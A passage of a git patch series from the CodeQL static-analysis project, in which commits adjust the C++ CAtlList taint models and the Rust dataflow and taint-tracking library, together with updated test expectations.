atl.cpp:398:3:398:3 | list | | | atl.cpp:353:10:353:13 | ref arg list | atl.cpp:356:24:356:27 | list | | | atl.cpp:353:10:353:13 | ref arg list | atl.cpp:398:3:398:3 | list | | -| atl.cpp:355:25:355:26 | 10 | atl.cpp:355:25:355:27 | call to CAtlList | TAINT | -| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:356:5:356:9 | list2 | | -| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:357:10:357:14 | list2 | | -| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:398:3:398:3 | list2 | | +| atl.cpp:355:26:355:27 | 10 | atl.cpp:355:26:355:28 | call to CAtlList | TAINT | +| atl.cpp:355:26:355:28 | call to CAtlList | atl.cpp:356:5:356:9 | list2 | | +| atl.cpp:355:26:355:28 | call to CAtlList | atl.cpp:357:10:357:14 | list2 | | +| atl.cpp:355:26:355:28 | call to CAtlList | atl.cpp:398:3:398:3 | list2 | | | atl.cpp:356:5:356:9 | ref arg list2 | atl.cpp:357:10:357:14 | list2 | | | atl.cpp:356:5:356:9 | ref arg list2 | atl.cpp:398:3:398:3 | list2 | | | atl.cpp:356:24:356:27 | list | atl.cpp:356:23:356:27 | & ... | | | atl.cpp:357:10:357:14 | ref arg list2 | atl.cpp:398:3:398:3 | list2 | | -| atl.cpp:359:25:359:26 | 10 | atl.cpp:359:25:359:27 | call to CAtlList | TAINT | -| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:360:5:360:9 | list3 | | -| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:361:10:361:14 | list3 | | -| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:364:24:364:28 | list3 | | -| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:398:3:398:3 | list3 | | +| atl.cpp:359:26:359:27 | 10 | atl.cpp:359:26:359:28 | call to CAtlList | TAINT | +| atl.cpp:359:26:359:28 | call to CAtlList | atl.cpp:360:5:360:9 | list3 | | +| atl.cpp:359:26:359:28 | call to CAtlList | atl.cpp:361:10:361:14 | list3 | | +| atl.cpp:359:26:359:28 | call to CAtlList | atl.cpp:364:24:364:28 | list3 | | +| atl.cpp:359:26:359:28 | call to CAtlList | atl.cpp:398:3:398:3 | list3 | | | atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:361:10:361:14 | list3 | | | atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:364:24:364:28 | list3 | | | atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:398:3:398:3 | list3 | | | atl.cpp:361:10:361:14 | ref arg list3 | atl.cpp:364:24:364:28 | list3 | | | atl.cpp:361:10:361:14 | ref arg list3 | atl.cpp:398:3:398:3 | list3 | | -| atl.cpp:363:25:363:26 | 10 | atl.cpp:363:25:363:27 | call to CAtlList | TAINT | -| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:364:5:364:9 | list4 | | -| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:365:10:365:14 | list4 | | -| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:398:3:398:3 | list4 | | +| atl.cpp:363:26:363:27 | 10 | atl.cpp:363:26:363:28 | call to CAtlList | TAINT | +| atl.cpp:363:26:363:28 | call to CAtlList | atl.cpp:364:5:364:9 | list4 | | +| atl.cpp:363:26:363:28 | call to CAtlList | atl.cpp:365:10:365:14 | list4 | | +| atl.cpp:363:26:363:28 | call to CAtlList | atl.cpp:398:3:398:3 | list4 | | | atl.cpp:364:5:364:9 | ref arg list4 | atl.cpp:365:10:365:14 | list4 | | | atl.cpp:364:5:364:9 | ref arg list4 | atl.cpp:398:3:398:3 | list4 | | | atl.cpp:364:24:364:28 | list3 | atl.cpp:364:23:364:28 | & ... | | | atl.cpp:365:10:365:14 | ref arg list4 | atl.cpp:398:3:398:3 | list4 | | -| atl.cpp:368:27:368:28 | 10 | atl.cpp:368:27:368:29 | call to CAtlList | TAINT | -| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:369:18:369:22 | list5 | | -| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:369:32:369:36 | list5 | | -| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:370:12:370:16 | list5 | | -| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:371:5:371:5 | list5 | | +| atl.cpp:368:28:368:29 | 10 | atl.cpp:368:28:368:30 | call to CAtlList | TAINT | +| atl.cpp:368:28:368:30 | call to CAtlList | atl.cpp:369:18:369:22 | list5 | | +| atl.cpp:368:28:368:30 | call to CAtlList | atl.cpp:369:32:369:36 | list5 | | +| atl.cpp:368:28:368:30 | call to CAtlList | atl.cpp:370:12:370:16 | list5 | | +| atl.cpp:368:28:368:30 | call to CAtlList | atl.cpp:371:5:371:5 | list5 | | | atl.cpp:369:18:369:22 | ref arg list5 | atl.cpp:370:12:370:16 | list5 | | | atl.cpp:369:18:369:22 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | | atl.cpp:369:24:369:27 | call to Find | atl.cpp:370:24:370:26 | pos | | @@ -459,11 +459,11 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:369:32:369:36 | ref arg list5 | atl.cpp:370:12:370:16 | list5 | | | atl.cpp:369:32:369:36 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | | atl.cpp:370:12:370:16 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | -| atl.cpp:374:27:374:28 | 10 | atl.cpp:374:27:374:29 | call to CAtlList | TAINT | -| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:375:7:375:11 | list6 | | -| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:376:18:376:22 | list6 | | -| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:377:12:377:16 | list6 | | -| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:378:5:378:5 | list6 | | +| atl.cpp:374:28:374:29 | 10 | atl.cpp:374:28:374:30 | call to CAtlList | TAINT | +| atl.cpp:374:28:374:30 | call to CAtlList | atl.cpp:375:7:375:11 | list6 | | +| atl.cpp:374:28:374:30 | call to CAtlList | atl.cpp:376:18:376:22 | list6 | | +| atl.cpp:374:28:374:30 | call to CAtlList | atl.cpp:377:12:377:16 | list6 | | +| atl.cpp:374:28:374:30 | call to CAtlList | atl.cpp:378:5:378:5 | list6 | | | atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:376:18:376:22 | list6 | | | atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:377:12:377:16 | list6 | | | atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | @@ -471,11 +471,11 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:376:18:376:22 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | | atl.cpp:376:24:376:32 | call to FindIndex | atl.cpp:377:24:377:26 | pos | | | atl.cpp:377:12:377:16 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | -| atl.cpp:381:27:381:28 | 10 | atl.cpp:381:27:381:29 | call to CAtlList | TAINT | -| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:382:18:382:22 | list7 | | -| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:383:7:383:11 | list7 | | -| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:384:12:384:16 | list7 | | -| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:385:5:385:5 | list7 | | +| atl.cpp:381:28:381:29 | 10 | atl.cpp:381:28:381:30 | call to CAtlList | TAINT | +| atl.cpp:381:28:381:30 | call to CAtlList | atl.cpp:382:18:382:22 | list7 | | +| atl.cpp:381:28:381:30 | call to CAtlList | atl.cpp:383:7:383:11 | list7 | | +| atl.cpp:381:28:381:30 | call to CAtlList | atl.cpp:384:12:384:16 | list7 | | +| atl.cpp:381:28:381:30 | call to CAtlList | atl.cpp:385:5:385:5 | list7 | | | atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:383:7:383:11 | list7 | | | atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:384:12:384:16 | list7 | | | atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | @@ -483,11 +483,11 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:383:7:383:11 | ref arg list7 | atl.cpp:384:12:384:16 | list7 | | | atl.cpp:383:7:383:11 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | | atl.cpp:384:12:384:16 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | -| atl.cpp:388:27:388:28 | 10 | atl.cpp:388:27:388:29 | call to CAtlList | TAINT | -| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:389:18:389:22 | list8 | | -| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:390:7:390:11 | list8 | | -| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:391:12:391:16 | list8 | | -| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:392:5:392:5 | list8 | | +| atl.cpp:388:28:388:29 | 10 | atl.cpp:388:28:388:30 | call to CAtlList | TAINT | +| atl.cpp:388:28:388:30 | call to CAtlList | atl.cpp:389:18:389:22 | list8 | | +| atl.cpp:388:28:388:30 | call to CAtlList | atl.cpp:390:7:390:11 | list8 | | +| atl.cpp:388:28:388:30 | call to CAtlList | atl.cpp:391:12:391:16 | list8 | | +| atl.cpp:388:28:388:30 | call to CAtlList | atl.cpp:392:5:392:5 | list8 | | | atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:390:7:390:11 | list8 | | | atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:391:12:391:16 | list8 | | | atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | @@ -495,11 +495,11 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:390:7:390:11 | ref arg list8 | atl.cpp:391:12:391:16 | list8 | | | atl.cpp:390:7:390:11 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | | atl.cpp:391:12:391:16 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | -| atl.cpp:394:27:394:28 | 10 | atl.cpp:394:27:394:29 | call to CAtlList | TAINT | -| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:395:7:395:11 | list9 | | -| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:395:19:395:23 | list9 | | -| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:396:12:396:16 | list9 | | -| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:397:5:397:5 | list9 | | +| atl.cpp:394:28:394:29 | 10 | atl.cpp:394:28:394:30 | call to CAtlList | TAINT | +| atl.cpp:394:28:394:30 | call to CAtlList | atl.cpp:395:7:395:11 | list9 | | +| atl.cpp:394:28:394:30 | call to CAtlList | atl.cpp:395:19:395:23 | list9 | | +| atl.cpp:394:28:394:30 | call to CAtlList | atl.cpp:396:12:396:16 | list9 | | +| atl.cpp:394:28:394:30 | call to CAtlList | atl.cpp:397:5:397:5 | list9 | | | atl.cpp:395:7:395:11 | ref arg list9 | atl.cpp:396:12:396:16 | list9 | | | atl.cpp:395:7:395:11 | ref arg list9 | atl.cpp:397:5:397:5 | list9 | | | atl.cpp:395:19:395:23 | ref arg list9 | atl.cpp:395:7:395:11 | list9 | | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 7e8a52fdb35..9284dc759eb 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected @@ -3,6 +3,8 @@ signatureMatches | atl.cpp:69:3:69:15 | _U_STRINGorID | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:70:3:70:15 | _U_STRINGorID | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:257:3:257:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:257:3:257:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:257:3:257:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:257:3:257:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | | atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | @@ -543,19 +545,34 @@ getParameterTypeName | atl.cpp:209:8:209:16 | SetAtGrow | 1 | INARGTYPclass:0 | | atl.cpp:211:6:211:15 | operator[] | 0 | size_t | | atl.cpp:257:3:257:10 | CAtlList | 0 | UINT | +| atl.cpp:257:3:257:10 | CAtlList | 0 | UINT | +| atl.cpp:260:12:260:18 | AddHead | 0 | INARGTYPclass:0 | | atl.cpp:260:12:260:18 | AddHead | 0 | INARGTYPclass:0 | | atl.cpp:261:8:261:18 | AddHeadList | 0 | const CAtlList * | +| atl.cpp:261:8:261:18 | AddHeadList | 0 | const CAtlList * | +| atl.cpp:263:12:263:18 | AddTail | 0 | INARGTYPclass:0 | | atl.cpp:263:12:263:18 | AddTail | 0 | INARGTYPclass:0 | | atl.cpp:264:8:264:18 | AddTailList | 0 | const CAtlList * | +| atl.cpp:264:8:264:18 | AddTailList | 0 | const CAtlList * | +| atl.cpp:265:12:265:15 | Find | 0 | INARGTYPclass:0 | | atl.cpp:265:12:265:15 | Find | 0 | INARGTYPclass:0 | | atl.cpp:265:12:265:15 | Find | 1 | POSITION | +| atl.cpp:265:12:265:15 | Find | 1 | POSITION | +| atl.cpp:266:12:266:20 | FindIndex | 0 | size_t | | atl.cpp:266:12:266:20 | FindIndex | 0 | size_t | | atl.cpp:267:6:267:10 | GetAt | 0 | POSITION | +| atl.cpp:267:6:267:10 | GetAt | 0 | POSITION | +| atl.cpp:280:12:280:22 | InsertAfter | 0 | POSITION | | atl.cpp:280:12:280:22 | InsertAfter | 0 | POSITION | | atl.cpp:280:12:280:22 | InsertAfter | 1 | INARGTYPclass:0 | +| atl.cpp:280:12:280:22 | InsertAfter | 1 | INARGTYPclass:0 | +| atl.cpp:281:12:281:23 | InsertBefore | 0 | POSITION | | atl.cpp:281:12:281:23 | InsertBefore | 0 | POSITION | | atl.cpp:281:12:281:23 | InsertBefore | 1 | INARGTYPclass:0 | +| atl.cpp:281:12:281:23 | InsertBefore | 1 | INARGTYPclass:0 | | atl.cpp:291:8:291:12 | SetAt | 0 | POSITION | +| atl.cpp:291:8:291:12 | SetAt | 0 | POSITION | +| atl.cpp:291:8:291:12 | SetAt | 1 | INARGTYPclass:0 | | atl.cpp:291:8:291:12 | SetAt | 1 | INARGTYPclass:0 | | atl.cpp:401:8:401:8 | operator= | 0 | IUnknown && | | atl.cpp:401:8:401:8 | operator= | 0 | const IUnknown & | From de75e033beb7b871e23f7dc706fd904bcbf19529 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 12:42:48 +0000 Subject: [PATCH 0795/1267] C++: Remove taint to POSITIONs. --- cpp/ql/lib/ext/CAtlList.model.yml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml index eb59fb8417e..411b9390a9c 100644 --- a/cpp/ql/lib/ext/CAtlList.model.yml +++ b/cpp/ql/lib/ext/CAtlList.model.yml @@ -7,9 +7,7 @@ extensions: - ["", "CAtlList", True, "AddHeadList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "AddTail", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "AddTailList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "FindIndex", "", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlList", True, "GetAt", "", "", "Argument[0]", "ReturnValue[*@]", "taint", "manual"] - ["", "CAtlList", True, "GetHead", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "GetHeadPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "GetNext", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] @@ -17,9 +15,5 @@ extensions: - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "GetTailPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "taint", "manual"] - - ["", "CAtlList", True, "SwapElements", "", "", "Argument[0]", "Argument[1]", "taint", "manual"] - - ["", "CAtlList", True, "SwapElements", "", "", "Argument[1]", "Argument[0]", "taint", "manual"] From 9dc3aecf67e2a5fcf47b2b5c10ccd37b4d7ae152 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 12:48:55 +0000 Subject: [PATCH 0796/1267] C++: Remove more taint to POSITIONs. --- cpp/ql/lib/ext/CAtlList.model.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml index 411b9390a9c..4b724ce717c 100644 --- a/cpp/ql/lib/ext/CAtlList.model.yml +++ b/cpp/ql/lib/ext/CAtlList.model.yml @@ -9,11 +9,9 @@ extensions: - ["", "CAtlList", True, "AddTailList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "GetHead", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlList", True, "GetHeadPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "GetNext", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "GetPrev", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlList", True, "GetTailPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "taint", "manual"] From c7dee4b02050448973eeb14c979fe7b254321bb3 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 12:52:13 +0000 Subject: [PATCH 0797/1267] C++: Remove more taint to POSITIONs. --- cpp/ql/lib/ext/CAtlList.model.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml index 4b724ce717c..a2de8a645d0 100644 --- a/cpp/ql/lib/ext/CAtlList.model.yml +++ b/cpp/ql/lib/ext/CAtlList.model.yml @@ -9,8 +9,6 @@ extensions: - ["", "CAtlList", True, "AddTailList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "GetHead", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CAtlList", True, "GetNext", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CAtlList", True, "GetPrev", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] From 279a30c7e80300d7ae5ffc003c5e1bff0bf1c5bd Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 12:52:41 +0000 Subject: [PATCH 0798/1267] C++: Make 'SetAt' a value-preserving step. --- cpp/ql/lib/ext/CAtlList.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml index a2de8a645d0..6d952f2ca13 100644 --- a/cpp/ql/lib/ext/CAtlList.model.yml +++ b/cpp/ql/lib/ext/CAtlList.model.yml @@ -12,4 +12,4 @@ extensions: - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "taint", "manual"] + - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] From a19f1d0b8b7f50fae9a72ed1e3014718bfc133e8 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 4 Dec 2024 14:01:53 +0100 Subject: [PATCH 0799/1267] Rust: Remove store step for repeat operand in array expression --- .../codeql/rust/dataflow/internal/DataFlowImpl.qll | 11 ++++++----- .../dataflow/local/DataFlowStep.expected | 1 - 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index fb82df30f9c..aa919afc894 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -984,11 +984,12 @@ module RustDataFlow implements InputSig { node2.asExpr() = tuple ) or - exists(ArrayExprCfgNode arr | - c instanceof ArrayElementContent and - node1.asExpr() = arr.getAnExpr() and - node2.asExpr() = arr - ) + c instanceof ArrayElementContent and + node1.asExpr() = + [ + node2.asExpr().(ArrayRepeatExprCfgNode).getRepeatOperand(), + node2.asExpr().(ArrayListExprCfgNode).getAnExpr() + ] or tupleAssignment(node1, node2.(PostUpdateNode).getPreUpdateNode(), c) or diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index a53b39840a7..f637b80dac2 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected @@ -524,7 +524,6 @@ storeStep | main.rs:336:20:336:20 | 2 | array[] | main.rs:336:16:336:33 | [...] | | main.rs:336:23:336:32 | source(...) | array[] | main.rs:336:16:336:33 | [...] | | main.rs:340:17:340:26 | source(...) | array[] | main.rs:340:16:340:31 | [...; 10] | -| main.rs:340:29:340:30 | 10 | array[] | main.rs:340:16:340:31 | [...; 10] | | main.rs:344:17:344:17 | 1 | array[] | main.rs:344:16:344:24 | [...] | | main.rs:344:20:344:20 | 2 | array[] | main.rs:344:16:344:24 | [...] | | main.rs:344:23:344:23 | 3 | array[] | main.rs:344:16:344:24 | [...] | From 3004639fca8214166994cbfe759b951d450b94b6 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 4 Dec 2024 13:30:39 +0100 Subject: [PATCH 0800/1267] Rust: Add default taint flow steps --- .../dataflow/internal/TaintTrackingImpl.qll | 34 +++++++++++++++++-- .../library-tests/dataflow/models/main.rs | 2 +- .../dataflow/models/models.expected | 6 ++++ .../dataflow/taint/TaintFlowStep.expected | 8 +++++ .../dataflow/taint/inline-taint-flow.expected | 12 +++++++ .../test/library-tests/dataflow/taint/main.rs | 6 ++-- 6 files changed, 62 insertions(+), 6 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll index 917ce0aea45..faf80143b54 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll @@ -1,15 +1,45 @@ private import rust private import codeql.dataflow.TaintTracking +private import codeql.rust.controlflow.CfgNodes +private import DataFlowImpl +private import codeql.rust.dataflow.FlowSummary +private import FlowSummaryImpl as FlowSummaryImpl private import DataFlowImpl module RustTaintTracking implements InputSig { predicate defaultTaintSanitizer(Node::Node node) { none() } /** - * Holds if the additional step from `src` to `sink` should be included in all + * Holds if the additional step from `pred` to `succ` should be included in all * global taint flow configurations. */ - predicate defaultAdditionalTaintStep(Node::Node src, Node::Node sink, string model) { none() } + predicate defaultAdditionalTaintStep(Node::Node pred, Node::Node succ, string model) { + model = "" and + ( + exists(BinaryExprCfgNode binary | + binary.getOperatorName() = ["+", "-", "*", "/", "%", "&", "|", "^", "<<", ">>"] and + pred.asExpr() = [binary.getLhs(), binary.getRhs()] and + succ.asExpr() = binary + ) + or + exists(PrefixExprCfgNode prefix | + prefix.getOperatorName() = ["-", "!"] and + pred.asExpr() = prefix.getExpr() and + succ.asExpr() = prefix + ) + or + pred.asExpr() = succ.asExpr().(CastExprCfgNode).getExpr() + or + exists(IndexExprCfgNode index | + index.getIndex() instanceof RangeExprCfgNode and + pred.asExpr() = index.getBase() and + succ.asExpr() = index + ) + ) + or + FlowSummaryImpl::Private::Steps::summaryLocalStep(pred.(Node::FlowSummaryNode).getSummaryNode(), + succ.(Node::FlowSummaryNode).getSummaryNode(), false, model) + } /** * Holds if taint flow configurations should allow implicit reads of `c` at sinks diff --git a/rust/ql/test/library-tests/dataflow/models/main.rs b/rust/ql/test/library-tests/dataflow/models/main.rs index 899736aec65..337cec5a220 100644 --- a/rust/ql/test/library-tests/dataflow/models/main.rs +++ b/rust/ql/test/library-tests/dataflow/models/main.rs @@ -23,7 +23,7 @@ fn coerce(_i: i64) -> i64 { fn test_coerce() { let s = source(14); - sink(coerce(s)); // $ MISSING: hasTaintFlow=14 + sink(coerce(s)); // $ hasTaintFlow=14 } enum MyPosEnum { diff --git a/rust/ql/test/library-tests/dataflow/models/models.expected b/rust/ql/test/library-tests/dataflow/models/models.expected index 3aea90c7fb3..6ebc72099ca 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.expected +++ b/rust/ql/test/library-tests/dataflow/models/models.expected @@ -4,6 +4,8 @@ edges | main.rs:15:13:15:21 | source(...) | main.rs:16:19:16:19 | s | provenance | | | main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | | main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | +| main.rs:25:13:25:22 | source(...) | main.rs:26:17:26:17 | s | provenance | | +| main.rs:26:17:26:17 | s | main.rs:26:10:26:18 | coerce(...) | provenance | | | main.rs:40:13:40:21 | source(...) | main.rs:41:27:41:27 | s | provenance | | | main.rs:40:13:40:21 | source(...) | main.rs:41:27:41:27 | s | provenance | | | main.rs:41:14:41:28 | ...::A(...) [A] | main.rs:42:22:42:23 | e1 [A] | provenance | | @@ -47,6 +49,9 @@ nodes | main.rs:16:10:16:20 | identity(...) | semmle.label | identity(...) | | main.rs:16:19:16:19 | s | semmle.label | s | | main.rs:16:19:16:19 | s | semmle.label | s | +| main.rs:25:13:25:22 | source(...) | semmle.label | source(...) | +| main.rs:26:10:26:18 | coerce(...) | semmle.label | coerce(...) | +| main.rs:26:17:26:17 | s | semmle.label | s | | main.rs:40:13:40:21 | source(...) | semmle.label | source(...) | | main.rs:40:13:40:21 | source(...) | semmle.label | source(...) | | main.rs:41:14:41:28 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | @@ -97,6 +102,7 @@ invalidSpecComponent #select | main.rs:16:10:16:20 | identity(...) | main.rs:15:13:15:21 | source(...) | main.rs:16:10:16:20 | identity(...) | $@ | main.rs:15:13:15:21 | source(...) | source(...) | | main.rs:16:10:16:20 | identity(...) | main.rs:15:13:15:21 | source(...) | main.rs:16:10:16:20 | identity(...) | $@ | main.rs:15:13:15:21 | source(...) | source(...) | +| main.rs:26:10:26:18 | coerce(...) | main.rs:25:13:25:22 | source(...) | main.rs:26:10:26:18 | coerce(...) | $@ | main.rs:25:13:25:22 | source(...) | source(...) | | main.rs:42:10:42:24 | get_var_pos(...) | main.rs:40:13:40:21 | source(...) | main.rs:42:10:42:24 | get_var_pos(...) | $@ | main.rs:40:13:40:21 